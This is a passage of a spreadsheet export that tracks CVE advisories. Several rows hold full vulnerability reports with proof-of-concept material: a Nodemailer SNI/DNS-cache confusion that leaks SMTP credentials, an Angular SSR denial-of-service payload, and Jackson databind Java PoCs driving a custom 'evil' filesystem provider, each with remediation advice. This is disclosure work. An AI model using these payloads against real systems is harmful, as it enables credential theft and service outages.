        attackerConfiguredServername: 'attacker.test',
        victimConfiguredServername: 'victim.test',
        serverObservedSniForBothConnections: observedSni,
        serverReceivedCredentials: decoded
    }, null, 2));
} finally {
    shared.dnsCache.clear();
    await new Promise(resolve =&gt; server.close(resolve));
}
```
### 3. Build and run
From the Nodemailer checkout:
```bash
npm install
npm run build
node ../audit/nodemailer/poc-dns-cache-servername-confusion.mjs
```
### Observed result
```json
{
  "attackerConfiguredServername": "attacker.test",
  "victimConfiguredServername": "victim.test",
  "serverObservedSniForBothConnections": [
    "attacker.test",
    "attacker.test"
  ],
  "serverReceivedCredentials": [
    "\\u0000attacker@example.test\\u0000attacker-secret",
    "\\u0000victim@example.test\\u0000victim-secret"
  ]
}
```
The victim configured `victim.test`, but the server observes `attacker.test` for both handshakes. The local certificate contains only `attacker.test`, yet the victim connection succeeds with `rejectUnauthorized: true` and then sends the victim's username and password.
### Expected result
The second connection must use `victim.test` for SNI and certificate hostname verification. With the PoC certificate, it should fail with a hostname mismatch before SMTP authentication occurs. It must never transmit victim credentials after validating the peer as `attacker.test`.
## Impact
The vulnerability affects long-running applications that create multiple Nodemailer transports in one process and let separate tenants or security domains configure transports that share a DNS `host`. A practical example is an email platform whose SMTP gateway uses SNI to route several customer-specific SMTP endpoints behind one hostname.
An attacker who can create or exercise one transport can prime the global cache with the shared host and the attacker's `tls.servername`. During the cache lifetime, a victim's direct SMTPS connection to that host can:
1. send the attacker's server name as SNI;
2. be routed to the attacker's TLS virtual host;
3. validate the attacker's certificate against the stale name, even though strict certificate validation is enabled; and
4. transmit the victim's SMTP username and password to that endpoint.
Possession of SMTP credentials may also let the attacker read or change mail account state where the provider reuses those credentials, or send mail as the victim. The exact secondary impact depends on the SMTP provider.
Where the attacker cannot control an SNI virtual host, stale cross-transport SNI can still cause certificate mismatch failures and cross-tenant availability impact.
### Preconditions and limitations
- Two transports must execute in the same Node.js process within the cache lifetime.
- They must use the same non-IP `host` cache key and different `tls.servername` values.
- Credential interception requires an endpoint or gateway that routes connections using SNI, or another deployment where the attacker controls the endpoint selected by the stale name.
- The demonstrated path uses direct SMTPS (`secure: true`). The STARTTLS upgrade path constructs TLS options separately and is not claimed vulnerable by this report.
## Suggested remediation
The DNS cache should store DNS data only. `servername` is connection-specific TLS policy and should not be persisted in a cache keyed solely by hostname.
One approach is to remove `servername` from `DnsCacheValue` and derive the returned value from the current request on every path:
```ts
return {
    host: selectedAddress,
    servername: options.servername || options.host || false,
    _addresses: addresses,
    cached: true
};
```
As defense in depth, `_resolveAndConnect()` should not overwrite an explicitly configured `opts.servername` with resolver metadata. Keying the cache by both host and server name would avoid this particular collision, but keeping TLS identity out of a DNS-address cache provides a cleaner separation.
A regression test should create two direct-TLS transports in the same process with the same DNS host and different explicit server names, then assert that each TLS connection observes and verifies its own configured name regardless of cache order.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100701</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101062</t>
        </is>
      </c>
      <c r="D315" s="5" t="inlineStr"/>
      <c r="E315" s="5" t="inlineStr"/>
      <c r="F315" s="5" t="inlineStr"/>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M315" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr"/>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>Obot: OAuth Dynamic Client Registration Enables API Token Theft via Audience Confusion in github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101062</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101895</t>
        </is>
      </c>
      <c r="D316" s="5" t="inlineStr"/>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/platform-server</t>
        </is>
      </c>
      <c r="M316" s="5" t="inlineStr">
        <is>
          <t>20.3.31, 21.2.23, 22.1.6</t>
        </is>
      </c>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr"/>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>A Denial of Service (DoS) vulnerability exists in `@angular/platform-server`'s DOM emulation parser (`domino`). When processing untrusted user input containing an incomplete DOCTYPE declaration ending with whitespace before EOF (such as `&lt;!DOCTYPE html `), the HTML parser enters an infinite synchronous loop, pegging CPU utilization at 100% and completely freezing the Node.js server process.
### Technical Description
In Angular Server-Side Rendering (SSR), `@angular/platform-server` uses `domino` to parse and sanitize HTML bound through template bindings (such as `[innerHTML]`) or manipulated via DOM APIs.
In Domino's HTML parser (`lib/HTMLParser.js`), tokenizer states that specify fixed lookahead—such as `after_doctype_name_state` (`lookahead = 6`)—rely on the state handler function to explicitly advance the character index pointer (`nextchar`). While branches for whitespace, `&gt;`, and keyword matching advance `nextchar`, the EOF branch (`case -1: // EOF`) emitted doctype and EOF tokens without advancing `nextchar` or transitioning out of the state:
```javascript
case -1: // EOF
  forcequirks();
  emitDoctype();
  emitEOF();
  break;
```
Because `nextchar` remained unchanged pointing to the EOF marker character (`\uFFFF`), the scanner loop (`while (nextchar &lt; numchars)`) repeatedly re-invoked `after_doctype_name_state` with `codepoint = EOF` indefinitely. In Node.js's single-threaded runtime, this synchronous loop starves the event loop entirely.
### Impact &amp; Reachability
* **Reachability**: The vulnerability is reachable in any Angular SSR application where untrusted user input is bound to `[innerHTML]`, interpolated into markup, or sanitized on the server.
* **Impact**: Successful exploitation allows an unauthenticated remote attacker to cause an immediate Denial of Service (DoS) by sending a payload containing an incomplete DOCTYPE (e.g., `&lt;!DOCTYPE html `). The Node.js SSR process locks up at 100% CPU and ceases responding to all concurrent and subsequent HTTP requests.
**Proof of Concept:**
```ts
import { Component } from '@angular/core';
@Component({
  selector: 'app-root',
  standalone: true,
  template: `&lt;div [innerHTML]="payload"&gt;&lt;/div&gt;`,
})
export class AppComponent {
  // Attacker-controlled input containing an incomplete DOCTYPE ending with whitespace
  payload = '&lt;!DOCTYPE html ';
}
```
### Workarounds
* Avoid binding untrusted user input directly to `[innerHTML]` in server-rendered templates; use standard text interpolation (`{{ userInput }}`) or `[textContent]` when raw HTML rendering is not required.
* Validate or sanitize user input before passing it to `[innerHTML]` on the server by stripping or rejecting strings matching `/^&lt;!DOCTYPE/i`.</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101895</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10601</t>
        </is>
      </c>
      <c r="D317" s="5" t="inlineStr"/>
      <c r="E317" s="5" t="inlineStr"/>
      <c r="F317" s="5" t="inlineStr"/>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr"/>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>Grafana: Path traversal in the Tempo and Loki data source plugins in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10601</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12249</t>
        </is>
      </c>
      <c r="D318" s="5" t="inlineStr"/>
      <c r="E318" s="5" t="inlineStr"/>
      <c r="F318" s="5" t="inlineStr"/>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/ubuntu/adsys</t>
        </is>
      </c>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr"/>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>Canonical ADSys Uses a Less Trusted Source in github.com/ubuntu/adsys.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github.com/ubuntu/adsys before v0.16.3-0.20250318112551-8b1939f96d38.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12249</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19032</t>
        </is>
      </c>
      <c r="D319" s="5" t="inlineStr"/>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="inlineStr"/>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M319" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr"/>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <t>### Summary
A `java.nio.file.Path` field bound from untrusted JSON reaches `JDKFromStringDeserializer.NioPathHelper.deserialize`. The attacker string flows through `new URI(value)` → `Path.of(uri)`, then on `FileSystemNotFoundException` into a `ServiceLoader&lt;FileSystemProvider&gt;` enumeration that calls `provider.getPath(uri)` on the first scheme-matching provider. No scheme is rejected, so untrusted JSON can drive an arbitrary registered provider under the default `JsonMapper.builder().build()`.
Impact is bounded. The JDK built-in providers (`file`, `jar`/zipfs) do no network I/O and do not mount, so the path is inert without a side-effecting third-party provider. Binding `Path` from untrusted input is already an anti-pattern.
### Description
`NioPathHelper.deserialize` performs provider resolution driven by the attacker URI (abridged; the real method also handles a Windows drive-letter prefix and wraps failures via `ctxt.handleInstantiationProblem(...)`):
```java
int colonIx = value.indexOf(':');
if (colonIx &lt; 0) { return Path.of(value); }
...
final URI uri = new URI(value);          // attacker-controlled URI string
try {
    return Path.of(uri);                  // resolves scheme -&gt; may load a FileSystemProvider
} catch (FileSystemNotFoundException cause) {
    final String scheme = uri.getScheme();
    for (FileSystemProvider provider : ServiceLoader.load(FileSystemProvider.class)) {
        if (provider.getScheme().equalsIgnoreCase(scheme)) {
            return provider.getPath(uri);  // attacker scheme selects &amp; drives a provider
        }
    }
    // no matching provider -&gt; ctxt.handleInstantiationProblem(...) (throws by default)
}
```
The attacker's scheme selects the provider and the attacker's URI is passed to it; the enumeration also forces provider classloading during `readValue`. For built-in schemes like `jar:`, `getPath` throws `FileSystemNotFoundException` (a mount requires explicit `newFileSystem`), surfacing as a wrapped `ValueInstantiationException` with no terminal effect. Any mount, network I/O, or resource access depends entirely on the selected provider.
## Vulnerable Code Location
- `src/main/java/tools/jackson/databind/deser/jdk/JDKFromStringDeserializer.java`
  - `STD_PATH` → `NioPathHelper.deserialize`; `NioPathHelper.deserialize` body 
       (`new URI` → `Path.of(uri)` → `ServiceLoader.load(FileSystemProvider.class)` → `provider.getPath(uri)`).
## Proof of Concept
Two PoCs are provided. 
&gt; PoC 2 registers a custom `FileSystemProvider` to show that attacker JSON reaches `provider.getPath(attackerURI)` inside `readValue`. Whether a third-party provider then does anything harmful is outside the library's control. The in-scope issue is **PoC 1** — the `jar:`/arbitrary-scheme path reaching the `ServiceLoader` fallback with no scheme restriction.
**PoC 1 — sink reached (built-in `jar` provider).** 
`com/poc/Vuln04_PathProvider.java`:
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
import java.nio.file.Path;
/**
 * Vuln 4: java.nio.file.Path deserialization resolves an attacker URI via
 * Path.of(uri) / ServiceLoader&lt;FileSystemProvider&gt;.
 */
public class Vuln04_PathProvider {
    public static class Config { public Path workdir; }
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = JsonMapper.builder().build();
        // jar: scheme forces FileSystemProvider resolution / mounting attempt on attacker URI.
        String json = "{\"workdir\":\"jar:file:/tmp/jackson_poc_evil.zip!/x\"}";
        System.out.println("Deserializing (default mapper): " + json);
        try {
            Config c = mapper.readValue(json, Config.class);
            System.out.println("Resolved Path = " + c.workdir + "  (class=" + (c.workdir==null?"null":c.workdir.getClass().getName()) + ")");
            System.out.println("RESULT: VULNERABLE - attacker URI scheme resolved through provider machinery during readValue");
        } catch (Throwable t) {
            System.out.println("Throwable during resolution: " + t.getClass().getName() + ": " + t.getMessage());
            System.out.println("RESULT: VULNERABLE (attacker URI drove provider resolution; threw " + t.getClass().getSimpleName() + " inside readValue)");
        }
    }
}
```
**PoC 2 — scheme-selection mechanism demo (custom `FileSystemProvider`).**
A third-party provider (scheme `evilscheme`) registered via `META-INF/services/java.nio.file.spi.FileSystemProvider`, which is standing in for *any* provider a real application ships. 
`com/poc/EvilFileSystemProvider.java`:
```java
package com.poc;
import java.nio.file.*;
import java.nio.file.spi.FileSystemProvider;
import java.nio.file.attribute.*;
import java.net.URI;
import java.io.IOException;
import java.util.*;
import java.util.Set;
import java.nio.channels.SeekableByteChannel;
/**
 * A custom java.nio.file.spi.FileSystemProvider registered via META-INF/services, using the
 * scheme "evilscheme". It stands in for ANY third-party FileSystemProvider present on a real
 * application's classpath. Its static initializer and getPath() record that they executed,
 * proving that attacker-controlled JSON drove provider class loading + provider.getPath(uri)
 * inside jackson's readValue.
 */
public class EvilFileSystemProvider extends FileSystemProvider {
    public static volatile boolean STATIC_INIT_RAN = false;
    public static volatile String GET_PATH_URI = null;
    static { STATIC_INIT_RAN = true; }
    @Override public String getScheme() { return "evilscheme"; }
    @Override public Path getPath(URI uri) {
        GET_PATH_URI = uri.toString();
        System.out.println("&gt;&gt;&gt; [EVIL-PROVIDER] getPath() invoked with attacker URI: " + uri);
        // A malicious/vulnerable provider could here open a socket, read a file, mount a FS, etc.
        return java.nio.file.Path.of(System.getProperty("java.io.tmpdir"), "evilprovider-marker");
    }
    // --- remaining abstract methods: minimal stubs ---
    @Override public FileSystem newFileSystem(URI uri, Map&lt;String,?&gt; env) { throw new UnsupportedOperationException(); }
    @Override public FileSystem getFileSystem(URI uri) { throw new FileSystemNotFoundException(); }
    @Override public SeekableByteChannel newByteChannel(Path p, Set&lt;? extends OpenOption&gt; o, FileAttribute&lt;?&gt;... a) throws IOException { throw new UnsupportedOperationException(); }
    @Override public DirectoryStream&lt;Path&gt; newDirectoryStream(Path d, DirectoryStream.Filter&lt;? super Path&gt; f) { throw new UnsupportedOperationException(); }
    @Override public void createDirectory(Path d, FileAttribute&lt;?&gt;... a) { throw new UnsupportedOperationException(); }
    @Override public void delete(Path p) { throw new UnsupportedOperationException(); }
    @Override public void copy(Path s, Path t, CopyOption... o) { throw new UnsupportedOperationException(); }
    @Override public void move(Path s, Path t, CopyOption... o) { throw new UnsupportedOperationException(); }
    @Override public boolean isSameFile(Path p, Path p2) { return false; }
    @Override public boolean isHidden(Path p) { return false; }
    @Override public FileStore getFileStore(Path p) { throw new UnsupportedOperationException(); }
    @Override public void checkAccess(Path p, AccessMode... m) { }
    @Override public &lt;V extends FileAttributeView&gt; V getFileAttributeView(Path p, Class&lt;V&gt; t, LinkOption... o) { return null; }
    @Override public &lt;A extends BasicFileAttributes&gt; A readAttributes(Path p, Class&lt;A&gt; t, LinkOption... o) { throw new UnsupportedOperationException(); }
    @Override public Map&lt;String,Object&gt; readAttributes(Path p, String a, LinkOption... o) { throw new UnsupportedOperationException(); }
    @Override public void setAttribute(Path p, String a, Object v, LinkOption... o) { }
}
```
Registration descriptor —
`src/main/resources/META-INF/services/java.nio.file.spi.FileSystemProvider`:
```
com.poc.EvilFileSystemProvider
```
Driver — `com/poc/Vuln04b_PathProviderMount.java`:
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
/**
 * Vuln 4 (end-to-end terminal effect): a third-party FileSystemProvider registered via
 * META-INF/services (scheme "evilscheme") stands in for any provider on a real app's
 * classpath. Attacker JSON with that scheme drives jackson's ServiceLoader fallback to
 * (1) load the provider class (running its static initializer) and (2) invoke
 * provider.getPath(attackerUri) -- all inside readValue, with NO application code.
 */
public class Vuln04b_PathProviderMount {
    public static class Config { public java.nio.file.Path workdir; }
    public static void main(String[] args) throws Exception {
        System.out.println("Provider static-init ran before deserialization? " + EvilFileSystemProvider.STATIC_INIT_RAN);
        ObjectMapper mapper = JsonMapper.builder().build();   // default config
        String json = "{\"workdir\":\"evilscheme://attacker-controlled/target?x=1\"}";
        System.out.println("Deserializing (default mapper): " + json);
        Config c = mapper.readValue(json, Config.class);
        System.out.println("Resolved Path = " + c.workdir);
        System.out.println("Provider static-init ran: " + EvilFileSystemProvider.STATIC_INIT_RAN);
        System.out.println("Provider.getPath() attacker URI: " + EvilFileSystemProvider.GET_PATH_URI);
        boolean ok = EvilFileSystemProvider.GET_PATH_URI != null
                &amp;&amp; EvilFileSystemProvider.GET_PATH_URI.contains("attacker-controlled");
        System.out.println(ok
            ? "RESULT: VULNERABLE - attacker JSON drove ServiceLoader provider load + provider.getPath(attackerUri) inside readValue (terminal effect proven)"
            : "RESULT: NOT reproduced");
    }
}
```
## Execution Steps
The PoCs need only the three Jackson 3.2.1 jars on the classpath and can be built with plain `javac`/`java` . PoC 2 additionally requires the `META-INF/services` descriptor to be on the **runtime** classpath
```bash
# 0. Locate the three published dependency jars.
M2="$HOME/.m2/repository"
DB="$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar"
CORE="$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar"
ANN="$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar"
CP="$DB:$CORE:$ANN"
# 1. Compile the three sources.
cd poc-project
mkdir -p out
javac -cp "$CP" -d out \
  src/main/java/com/poc/EvilFileSystemProvider.java \
  src/main/java/com/poc/Vuln04_PathProvider.java \
  src/main/java/com/poc/Vuln04b_PathProviderMount.java
# 2. Put the ServiceLoader descriptor on the runtime classpath (needed by PoC 2).
mkdir -p out/META-INF/services
cp src/main/resources/META-INF/services/java.nio.file.spi.FileSystemProvider \
   out/META-INF/services/java.nio.file.spi.FileSystemProvider
# 3. Run both PoCs.
java -cp "out:$CP" com.poc.Vuln04_PathProvider        # PoC 1
java -cp "out:$CP" com.poc.Vuln04b_PathProviderMount  # PoC 2
```
## Reproduction Evidence
Executed against jackson-databind 3.2.1 (OpenJDK 25).
**PoC 1 :**
```
Deserializing (default mapper): {"workdir":"jar:file:/tmp/jackson_poc_evil.zip!/x"}
Throwable during resolution: tools.jackson.databind.exc.ValueInstantiationException: Cannot construct instance of `java.nio.file.Path`, problem: `java.nio.file.FileSystemNotFoundException`
 at [Source: REDACTED (`StreamReadFeature.INCLUDE_SOURCE_IN_LOCATION` disabled); byte offset: #UNKNOWN] (through reference chain: com.poc.Vuln04_PathProvider$Config["workdir"])
RESULT: VULNERABLE (attacker URI drove provider resolution; threw ValueInstantiationException inside readValue)
```
Notes: the JDK **built-in** `jar` provider's `getPath` does not auto-mount (it also throws `FileSystemNotFoundException`, since only `newFileSystem` mounts). PoC 1 proves the in-scope defect: attacker input reaches the scheme-driven `ServiceLoader` resolution during `readValue` with no allow-list. PoC 2 only illustrates the downstream mechanism.
**PoC 2  :**
```
Provider static-init ran before deserialization? true
Deserializing (default mapper): {"workdir":"evilscheme://attacker-controlled/target?x=1"}
&gt;&gt;&gt; [EVIL-PROVIDER] getPath() invoked with attacker URI: evilscheme://attacker-controlled/target?x=1
Resolved Path = /var/folders/.../T/evilprovider-marker
Provider static-init ran: true
Provider.getPath() attacker URI: evilscheme://attacker-controlled/target?x=1
RESULT: VULNERABLE - attacker JSON drove ServiceLoader provider load + provider.getPath(attackerUri) inside readValue (terminal effect proven)
```
Purely from a JSON string, jackson's `ServiceLoader` fallback selected the attacker-named scheme's provider and invoked `provider.getPath(uri)` with the full attacker URI inside `readValue`. Whether a given provider then does anything harmful is outside the library's control; the in-scope issue is the absence of a scheme restriction before this fallback runs.
## Impact
Untrusted JSON drives `provider.getPath(attackerURI)` on an attacker-chosen provider during `readValue`. With only the JDK built-in providers this is inert. Real impact requires a side-effecting third-party provider on the classpath. The fix is to close the
scheme-restriction gap.
## Recommended Fix
1. **Restrict the resolved scheme to a fixed, hard-coded set** ; reject `jar:` and other schemes via `ctxt.handleWeirdStringValue(...)`. A hard-coded set keeps the fix backport-safe with no new configuration surface.
2. **Skip the `ServiceLoader&lt;FileSystemProvider&gt;` enumeration for disallowed schemes**, so untrusted JSON cannot select and drive an arbitrary registered provider.
3. Document that `java.nio.file.Path`-typed fields should not be bound from untrusted JSON.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19032</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32599</t>
        </is>
      </c>
      <c r="D320" s="5" t="inlineStr"/>
      <c r="E320" s="5" t="inlineStr"/>
      <c r="F320" s="5" t="inlineStr"/>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="inlineStr"/>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/gravitl/netmaker</t>
        </is>
      </c>
      <c r="M320" s="5" t="inlineStr">
        <is>
          <t>1.5.0</t>
        </is>
      </c>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr"/>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>Netmaker has a boolean‑based SQL Injection in github.com/gravitl/netmaker</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32599</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42127</t>
        </is>
      </c>
      <c r="D321" s="5" t="inlineStr"/>
      <c r="E321" s="5" t="inlineStr"/>
      <c r="F321" s="5" t="inlineStr"/>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr"/>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr"/>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>Grafana: Pre-authentication denial of service in the public dashboard query handler in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42127</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42129</t>
        </is>
      </c>
      <c r="D322" s="5" t="inlineStr"/>
      <c r="E322" s="5" t="inlineStr"/>
      <c r="F322" s="5" t="inlineStr"/>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr"/>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
